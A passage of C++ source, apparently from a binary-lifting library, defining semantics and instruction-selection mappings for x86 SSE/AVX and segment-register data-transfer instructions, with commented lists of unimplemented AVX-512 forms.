DEF_ISEL(MOVUPD_MEMpd_XMMpd) = MOVxPD<MV128W, V128>; DEF_ISEL(MOVUPD_XMMpd_XMMpd_0F11) = MOVxPD<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVUPD_XMMdq_MEMdq) = MOVxPD<VV128W, MV128>; DEF_ISEL(VMOVUPD_XMMdq_XMMdq_10) = MOVxPD<VV128W, VV128>; DEF_ISEL(VMOVUPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>; DEF_ISEL(VMOVUPD_XMMdq_XMMdq_11) = MOVxPD<VV128W, VV128>; DEF_ISEL(VMOVUPD_YMMqq_MEMqq) = MOVxPD<VV256W, 
MV256>; DEF_ISEL(VMOVUPD_YMMqq_YMMqq_10) = MOVxPD<VV256W, VV256>; DEF_ISEL(VMOVUPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>; DEF_ISEL(VMOVUPD_YMMqq_YMMqq_11) = MOVxPD<VV256W, VV256>; # if HAS_FEATURE_AVX512 //4991 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4992 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4993 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4994 VMOVUPD VMOVUPD_MEMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4995 VMOVUPD VMOVUPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4996 VMOVUPD VMOVUPD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4997 VMOVUPD VMOVUPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4998 VMOVUPD VMOVUPD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4999 VMOVUPD VMOVUPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //5000 VMOVUPD VMOVUPD_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //5001 VMOVUPD VMOVUPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //5002 VMOVUPD VMOVUPD_MEMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTDQ_MEMdq_XMMdq) = MOVDQx<MV128W, V128>; DEF_ISEL(MOVNTDQA_XMMdq_MEMdq) = MOVDQx<V128W, MV128>; DEF_ISEL(MOVDQU_XMMdq_MEMdq) = MOVDQx<V128W, MV128>; DEF_ISEL(MOVDQU_XMMdq_XMMdq_0F6F) = 
MOVDQx<V128W, V128>; DEF_ISEL(MOVDQU_MEMdq_XMMdq) = MOVDQx<MV128W, V128>; DEF_ISEL(MOVDQU_XMMdq_XMMdq_0F7F) = MOVDQx<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVNTDQ_MEMdq_XMMdq) = MOVDQx<MV128W, V128>; DEF_ISEL(VMOVNTDQ_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>; //5061 VMOVNTDQ VMOVNTDQ_MEMu32_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //5062 VMOVNTDQ VMOVNTDQ_MEMu32_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //5063 VMOVNTDQ VMOVNTDQ_MEMu32_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT DEF_ISEL(VMOVNTDQA_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>; DEF_ISEL(VMOVNTDQA_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>; //4142 VMOVNTDQA VMOVNTDQA_ZMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //4143 VMOVNTDQA VMOVNTDQA_XMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //4144 VMOVNTDQA VMOVNTDQA_YMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT DEF_ISEL(VMOVDQU_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>; DEF_ISEL(VMOVDQU_XMMdq_XMMdq_6F) = MOVDQx<VV128W, VV128>; DEF_ISEL(VMOVDQU_MEMdq_XMMdq) = MOVDQx<MV128W, VV128>; DEF_ISEL(VMOVDQU_XMMdq_XMMdq_7F) = MOVDQx<VV128W, VV128>; DEF_ISEL(VMOVDQU_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>; DEF_ISEL(VMOVDQU_YMMqq_YMMqq_6F) = MOVDQx<VV256W, VV256>; DEF_ISEL(VMOVDQU_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>; DEF_ISEL(VMOVDQU_YMMqq_YMMqq_7F) = MOVDQx<VV256W, VV256>; #endif // HAS_FEATURE_AVX DEF_ISEL(MOVDQA_MEMdq_XMMdq) = MOVDQx<MV128W, V128>; DEF_ISEL(MOVDQA_XMMdq_XMMdq_0F7F) = MOVDQx<V128W, V128>; DEF_ISEL(MOVDQA_XMMdq_MEMdq) = MOVDQx<V128W, MV128>; DEF_ISEL(MOVDQA_XMMdq_XMMdq_0F6F) = MOVDQx<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVDQA_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>; DEF_ISEL(VMOVDQA_XMMdq_XMMdq_6F) = MOVDQx<VV128W, VV128>; 
DEF_ISEL(VMOVDQA_MEMdq_XMMdq) = MOVDQx<MV128W, VV128>; DEF_ISEL(VMOVDQA_XMMdq_XMMdq_7F) = MOVDQx<VV128W, VV128>; DEF_ISEL(VMOVDQA_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>; DEF_ISEL(VMOVDQA_YMMqq_YMMqq_6F) = MOVDQx<VV256W, VV256>; DEF_ISEL(VMOVDQA_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>; DEF_ISEL(VMOVDQA_YMMqq_YMMqq_7F) = MOVDQx<VV256W, VV256>; #endif // HAS_FEATURE_AVX DEF_ISEL(MOVLPS_MEMq_XMMps) = MOVLPS<MV64W, V128>; DEF_ISEL(MOVLPS_XMMq_MEMq) = MOVLPS<V128W, MV64>; IF_AVX(DEF_ISEL(VMOVLPS_MEMq_XMMq) = MOVLPS<MV64W, VV128>;) IF_AVX(DEF_ISEL(VMOVLPS_XMMdq_XMMdq_MEMq) = VMOVLPS;) DEF_ISEL(MOVHLPS_XMMq_XMMq) = MOVHLPS; IF_AVX(DEF_ISEL(VMOVHLPS_XMMdq_XMMq_XMMq) = VMOVHLPS;) IF_AVX(DEF_ISEL(VMOVHLPS_XMMdq_XMMdq_XMMdq) = VMOVHLPS;) DEF_ISEL(MOVLHPS_XMMq_XMMq) = MOVLHPS; IF_AVX(DEF_ISEL(VMOVLHPS_XMMdq_XMMq_XMMq) = VMOVLHPS;) IF_AVX(DEF_ISEL(VMOVLHPS_XMMdq_XMMdq_XMMdq) = VMOVLHPS;) #if HAS_FEATURE_AVX # if HAS_FEATURE_AVX512 //4606 VMOVLPS DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2 //4607 VMOVLPS VMOVLPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2 # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVLPD_XMMsd_MEMq) = MOVLPD<V128W, MV64>; DEF_ISEL(MOVLPD_MEMq_XMMsd) = MOVLPD<MV64W, V128>; IF_AVX(DEF_ISEL(VMOVLPD_MEMq_XMMq) = MOVLPD<MV64W, VV128>;) IF_AVX(DEF_ISEL(VMOVLPD_XMMdq_XMMdq_MEMq) = VMOVLPD;) #if HAS_FEATURE_AVX # if HAS_FEATURE_AVX512 //4599 VMOVLPD VMOVLPD_XMMf64_XMMf64_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR //4600 VMOVLPD VMOVLPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX namespace { template <typename D, typename S> DEF_SEM(MOVSD_MEM, D dst, S src) { FWriteV64(dst, FExtractV64(FReadV64(src), 0)); return memory; } DEF_SEM(MOVSD, V128W dst, V128 src) { FWriteV64(dst, FInsertV64(FReadV64(dst), 0, FExtractV64(FReadV64(src), 0))); return memory; } #if HAS_FEATURE_AVX // Basically the 
same as `VMOVLPD`. DEF_SEM(VMOVSD, VV128W dst, V128 src1, V128 src2) { FWriteV64(dst, FInsertV64(FReadV64(src2), 1, FExtractV64(FReadV64(src1), 1))); return memory; } #endif // HAS_FEATURE_AVX } // namespace DEF_ISEL(MOVSD_XMM_XMMsd_XMMsd_0F10) = MOVSD; DEF_ISEL(MOVSD_XMM_XMMdq_MEMsd) = MOVSD_MEM<V128W, MV64>; DEF_ISEL(MOVSD_XMM_MEMsd_XMMsd) = MOVSD_MEM<MV64W, V128>; DEF_ISEL(MOVSD_XMM_XMMsd_XMMsd_0F11) = MOVSD; #if HAS_FEATURE_AVX DEF_ISEL(VMOVSD_XMMdq_MEMq) = MOVSD_MEM<VV128W, MV64>; DEF_ISEL(VMOVSD_MEMq_XMMq) = MOVSD_MEM<MV64W, VV128>; DEF_ISEL(VMOVSD_XMMdq_XMMdq_XMMq_10) = VMOVSD; DEF_ISEL(VMOVSD_XMMdq_XMMdq_XMMq_11) = VMOVSD; # if HAS_FEATURE_AVX512 //3632 VMOVSD VMOVSD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR //3633 VMOVSD VMOVSD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR //3634 VMOVSD VMOVSD_XMMf64_MASKmskw_XMMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR //3635 VMOVSD VMOVSD_XMMf64_MASKmskw_XMMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTSD_MEMq_XMMq) = MOVSD_MEM<MV64W, V128>; namespace { template <typename D, typename S> DEF_SEM(MOVSS_MEM, D dst, S src) { FWriteV32(dst, FExtractV32(FReadV32(src), 0)); return memory; } DEF_SEM(MOVSS, V128W dst, V128 src) { FWriteV32(dst, FInsertV32(FReadV32(dst), 0, FExtractV32(FReadV32(src), 0))); return memory; } #if HAS_FEATURE_AVX DEF_SEM(VMOVSS, VV128W dst, V128 src1, V128 src2) { FWriteV32(dst, FInsertV32(FReadV32(src1), 0, FExtractV32(FReadV32(src2), 0))); return memory; } #endif // HAS_FEATURE_AVX } // namespace DEF_ISEL(MOVSS_XMMdq_MEMss) = MOVSS_MEM<V128W, MV32>; DEF_ISEL(MOVSS_MEMss_XMMss) = MOVSS_MEM<MV32W, V128>; DEF_ISEL(MOVSS_XMMss_XMMss_0F10) = MOVSS; 
DEF_ISEL(MOVSS_XMMss_XMMss_0F11) = MOVSS;
#if HAS_FEATURE_AVX
DEF_ISEL(VMOVSS_XMMdq_MEMd) = MOVSS_MEM<VV128W, MV32>;
DEF_ISEL(VMOVSS_MEMd_XMMd) = MOVSS_MEM<MV32W, V128>;
DEF_ISEL(VMOVSS_XMMdq_XMMdq_XMMd_10) = VMOVSS;
DEF_ISEL(VMOVSS_XMMdq_XMMdq_XMMd_11) = VMOVSS;
# if HAS_FEATURE_AVX512
// AVX-512 masked forms, not yet implemented; kept here for reference:
//3650 VMOVSS VMOVSS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3651 VMOVSS VMOVSS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR
//3652 VMOVSS VMOVSS_XMMf32_MASKmskw_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
//3653 VMOVSS VMOVSS_XMMf32_MASKmskw_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR
# endif  // HAS_FEATURE_AVX512
#endif  // HAS_FEATURE_AVX

// MOVNTSS (non-temporal scalar-float store) reuses the plain scalar store;
// the non-temporal memory hint is not modeled here.
DEF_ISEL(MOVNTSS_MEMd_XMMd) = MOVSS_MEM<MV32W, V128>;

namespace {

// MOVHPD load form: replace lane 1 (bits 127:64) of `dst` with the 64-bit
// value read from memory; lane 0 is preserved.
DEF_SEM(MOVHPD, V128W dst, MV64 src) {
  FWriteV64(dst, FInsertV64(FReadV64(dst), 1, FExtractV64(FReadV64(src), 0)));
  return memory;
}

// MOVHPD store form: write lane 1 (bits 127:64) of `src` to memory.
DEF_SEM(MOVHPD_STORE, MV64W dst, V128 src) {
  FWriteV64(dst, FExtractV64(FReadV64(src), 1));
  return memory;
}

#if HAS_FEATURE_AVX

// Three-operand VMOVHPD: copy `src1` and overwrite its lane 1 with the
// 64-bit value read from memory.
// NOTE(review): `dst` is declared VV256W here while the sibling VMOVHPS
// uses the same pattern — presumably the wide write type handles the
// AVX upper-lane behavior; confirm against the vector-write helpers.
DEF_SEM(VMOVHPD, VV256W dst, V128 src1, MV64 src2) {
  FWriteV64(dst, FInsertV64(FReadV64(src1), 1, FExtractV64(FReadV64(src2), 0)));
  return memory;
}
#endif  // HAS_FEATURE_AVX

}  // namespace

DEF_ISEL(MOVHPD_XMMsd_MEMq) = MOVHPD;
DEF_ISEL(MOVHPD_MEMq_XMMsd) = MOVHPD_STORE;
IF_AVX(DEF_ISEL(VMOVHPD_XMMdq_XMMq_MEMq) = VMOVHPD;)
IF_AVX(DEF_ISEL(VMOVHPD_MEMq_XMMdq) = MOVHPD_STORE;)

// AVX-512 forms, not yet implemented; kept here for reference:
//5181 VMOVHPD VMOVHPD_XMMf64_XMMf64_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR
//5182 VMOVHPD VMOVHPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR

namespace {

// MOVHPS load form: copy two packed floats from memory into lanes 2 and 3
// (the high 64 bits) of `dst`; lanes 0 and 1 are preserved.
DEF_SEM(MOVHPS, V128W dst, MV64 src) {
  auto dst_vec = FReadV32(dst);
  auto src_vec = FReadV32(src);
  auto low_entry = FExtractV32(src_vec, 0);
  auto high_entry = FExtractV32(src_vec, 1);
  FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 2, low_entry), 3, high_entry));
  return memory;
}

// MOVHPS store form: write lanes 2 and 3 (the high 64 bits) of `src` to
// memory as two packed floats. The memory view is cleared first, then
// both of its lanes are filled by the inserts below.
DEF_SEM(MOVHPS_STORE, MV64W dst, V128 src) {
  auto dst_vec = FClearV32(FReadV32(dst));
  auto src_vec = FReadV32(src);
  auto low_entry = FExtractV32(src_vec, 2);
  auto high_entry = FExtractV32(src_vec, 3);
  FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 0, low_entry), 1, high_entry));
  return memory;
}

#if HAS_FEATURE_AVX

// Three-operand VMOVHPS: copy `src1` and overwrite its lanes 2 and 3 with
// the two packed floats read from memory.
DEF_SEM(VMOVHPS, VV256W dst, V128 src1, MV64 src2) {
  auto dst_vec = FReadV32(src1);
  auto src_vec = FReadV32(src2);
  auto low_entry = FExtractV32(src_vec, 0);
  auto high_entry = FExtractV32(src_vec, 1);
  FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 2, low_entry), 3, high_entry));
  return memory;
}
#endif  // HAS_FEATURE_AVX

}  // namespace

DEF_ISEL(MOVHPS_XMMq_MEMq) = MOVHPS;
DEF_ISEL(MOVHPS_MEMq_XMMps) = MOVHPS_STORE;
IF_AVX(DEF_ISEL(VMOVHPS_XMMdq_XMMq_MEMq) = VMOVHPS;)
IF_AVX(DEF_ISEL(VMOVHPS_MEMq_XMMdq) = MOVHPS_STORE;)

// AVX-512 forms, not yet implemented; kept here for reference:
//5197 VMOVHPS VMOVHPS_XMMf32_XMMf32_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2
//5198 VMOVHPS VMOVHPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2

namespace {

// Writes to segment registers. Each semantic stores the 16-bit selector
// into the destination register, then issues a synchronous hyper call so
// the runtime can react to the segment change (e.g. update any hidden
// segment state it maintains).

template <typename T>
DEF_SEM(MOV_ES, R16W dst, T src) {
  Write(dst, Read(src));
  return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentES);
}

template <typename T>
DEF_SEM(MOV_SS, R16W dst, T src) {
  Write(dst, Read(src));
  return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentSS);
}

template <typename T>
DEF_SEM(MOV_DS, R16W dst, T src) {
  Write(dst, Read(src));
  return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentDS);
}

template <typename T>
DEF_SEM(MOV_FS, R16W dst, T src) {
  Write(dst, Read(src));
  return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentFS);
}

template <typename T>
DEF_SEM(MOV_GS, R16W dst, T src) {
  Write(dst, Read(src));
  return __remill_sync_hyper_call(state, memory, SyncHyperCall::kX86SetSegmentGS);
}

}  // namespace

// Reads of a segment register go through the generic `MOV` semantic; writes
// dispatch to the per-segment semantics above so the hyper call fires.
DEF_ISEL(MOV_MEMw_SEG) = MOV<M16W, R16>;
DEF_ISEL(MOV_GPRv_SEG_16) = MOV<R16W, R16>;
DEF_ISEL(MOV_GPRv_SEG_32) = MOV<R32W, R16>;
IF_64BIT(DEF_ISEL(MOV_GPRv_SEG_64) = MOV<R64W, R16>;)
DEF_ISEL(MOV_SEG_MEMw_ES) = MOV_ES<M16>;
DEF_ISEL(MOV_SEG_MEMw_SS) = MOV_SS<M16>;
DEF_ISEL(MOV_SEG_MEMw_DS) = MOV_DS<M16>;
DEF_ISEL(MOV_SEG_MEMw_FS) = MOV_FS<M16>;
DEF_ISEL(MOV_SEG_MEMw_GS) = MOV_GS<M16>;
DEF_ISEL(MOV_SEG_GPR16_ES) = MOV_ES<R16>;
DEF_ISEL(MOV_SEG_GPR16_SS) = MOV_SS<R16>;
DEF_ISEL(MOV_SEG_GPR16_DS) = MOV_DS<R16>;
DEF_ISEL(MOV_SEG_GPR16_FS) = MOV_FS<R16>;
DEF_ISEL(MOV_SEG_GPR16_GS) = MOV_GS<R16>;

/* Not-yet-implemented DATAXFER iforms (XED listing):
25 MOV_DR MOV_DR_DR_GPR32 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
26 MOV_DR MOV_DR_DR_GPR64 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
27 MOV_DR MOV_DR_GPR32_DR DATAXFER BASE I86 ATTRIBUTES: RING0
28 MOV_DR MOV_DR_GPR64_DR DATAXFER BASE I86 ATTRIBUTES: RING0
1312 MASKMOVDQU MASKMOVDQU_XMMdq_XMMdq DATAXFER SSE2 SSE2 ATTRIBUTES: FIXED_BASE0 MASKOP NOTSX
545 MOVMSKPS MOVMSKPS_GPR32_XMMps DATAXFER SSE SSE ATTRIBUTES:
585 MOVSHDUP MOVSHDUP_XMMps_MEMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
586 MOVSHDUP MOVSHDUP_XMMps_XMMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
647 MOVLHPS MOVLHPS_XMMq_XMMq DATAXFER SSE SSE ATTRIBUTES:
648 MOVQ2DQ MOVQ2DQ_XMMdq_MMXq DATAXFER SSE2 SSE2 ATTRIBUTES: MMX_EXCEPT NOTSX
689 MOV_CR MOV_CR_CR_GPR32 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
690 MOV_CR MOV_CR_CR_GPR64 DATAXFER BASE I86 ATTRIBUTES: NOTSX RING0
691 MOV_CR MOV_CR_GPR32_CR DATAXFER BASE I86 ATTRIBUTES: RING0
692 MOV_CR MOV_CR_GPR64_CR DATAXFER BASE I86 ATTRIBUTES: RING0
957 MOVSLDUP MOVSLDUP_XMMps_MEMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
958 MOVSLDUP MOVSLDUP_XMMps_XMMps DATAXFER SSE3 SSE3 ATTRIBUTES: REQUIRES_ALIGNMENT
1071 MOVBE MOVBE_GPRv_MEMv DATAXFER MOVBE MOVBE ATTRIBUTES: SCALABLE
1072 MOVBE MOVBE_MEMv_GPRv DATAXFER MOVBE MOVBE ATTRIBUTES: SCALABLE
1484 MOVDQ2Q MOVDQ2Q_MMXq_XMMq DATAXFER SSE2 SSE2
ATTRIBUTES: MMX_EXCEPT NOTSX 1495 MOVMSKPD MOVMSKPD_GPR32_XMMpd DATAXFER SSE2 SSE2 ATTRIBUTES: 1829 MASKMOVQ MASKMOVQ_MMXq_MMXq DATAXFER MMX PENTIUMMMX ATTRIBUTES: FIXED_BASE0 MASKOP NOTSX 1839 MOVHLPS MOVHLPS_XMMq_XMMq DATAXFER SSE SSE ATTRIBUTES: 1880 MOVDDUP MOVDDUP_XMMdq_MEMq DATAXFER SSE3 SSE3 ATTRIBUTES: UNALIGNED 1881 MOVDDUP MOVDDUP_XMMdq_XMMq DATAXFER SSE3 SSE3 ATTRIBUTES: UNALIGNED 1882 BSWAP BSWAP_GPRv DATAXFER BASE I486REAL ATTRIBUTES: SCALABLE 2101 VMOVMSKPD VMOVMSKPD_GPR32d_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2102 VMOVMSKPD VMOVMSKPD_GPR32d_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2107 VMOVMSKPS VMOVMSKPS_GPR32d_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2108 VMOVMSKPS VMOVMSKPS_GPR32d_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2202 VMOVSHDUP VMOVSHDUP_XMMdq_MEMdq DATAXFER AVX AVX ATTRIBUTES: 2203 VMOVSHDUP VMOVSHDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2204 VMOVSHDUP VMOVSHDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES: 2205 VMOVSHDUP VMOVSHDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2281 VMOVDDUP VMOVDDUP_XMMdq_MEMq DATAXFER AVX AVX ATTRIBUTES: 2282 VMOVDDUP VMOVDDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2283 VMOVDDUP VMOVDDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES: 2284 VMOVDDUP VMOVDDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2464 VMOVSLDUP VMOVSLDUP_XMMdq_MEMdq DATAXFER AVX AVX ATTRIBUTES: 2465 VMOVSLDUP VMOVSLDUP_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES: 2466 VMOVSLDUP VMOVSLDUP_YMMqq_MEMqq DATAXFER AVX AVX ATTRIBUTES: 2467 VMOVSLDUP VMOVSLDUP_YMMqq_YMMqq DATAXFER AVX AVX ATTRIBUTES: 2619 VMOVLHPS VMOVLHPS_XMMdq_XMMq_XMMq DATAXFER AVX AVX ATTRIBUTES: 3395 VMOVHLPS VMOVHLPS_XMMdq_XMMdq_XMMdq DATAXFER AVX AVX ATTRIBUTES: 3804 VPMOVDB VPMOVDB_XMMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3805 VPMOVDB VPMOVDB_MEMu8_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3806 VPMOVDB VPMOVDB_XMMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: 
MASKOP_EVEX 3807 VPMOVDB VPMOVDB_MEMu8_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3808 VPMOVDB VPMOVDB_XMMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3809 VPMOVDB VPMOVDB_MEMu8_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3814 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3815 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_ZMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3816 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3817 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3818 VPMOVSDB VPMOVSDB_XMMi8_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3819 VPMOVSDB VPMOVSDB_MEMi8_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3826 VPMOVDW VPMOVDW_YMMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX 3827 VPMOVDW VPMOVDW_MEMu16_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3828 VPMOVDW VPMOVDW_XMMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX 3829 VPMOVDW VPMOVDW_MEMu16_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3830 VPMOVDW VPMOVDW_XMMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX 3831 VPMOVDW VPMOVDW_MEMu16_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION 3853 